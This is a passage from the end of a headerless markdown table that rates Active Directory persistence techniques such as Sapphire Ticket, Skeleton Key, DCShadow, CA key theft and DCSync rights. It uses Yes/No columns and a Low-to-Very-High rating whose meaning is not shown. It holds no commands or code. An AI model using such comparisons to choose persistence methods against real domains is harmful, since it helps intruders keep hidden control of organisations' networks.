| Sapphire Ticket| Yes                     | No                         | Yes                | Very High            |
| Skeleton Key   | Yes                     | Yes                        | No                 | Low                  |
| AdminSDHolder  | Yes                     | Yes                        | Yes                | Medium               |
| DSRM           | Yes                     | Yes                        | Yes                | High                 |
| SID History    | Yes                     | Yes                        | Yes                | Medium               |
| DCShadow       | Yes                     | Yes                        | Yes                | Very High            |
| CA Key Theft   | Yes                     | Yes                        | Yes                | Very High            |
| DCSync Rights  | Yes                     | Yes                        | Yes                | Medium               |
| Machine Account| Yes                     | Yes                        | Yes                | High                 |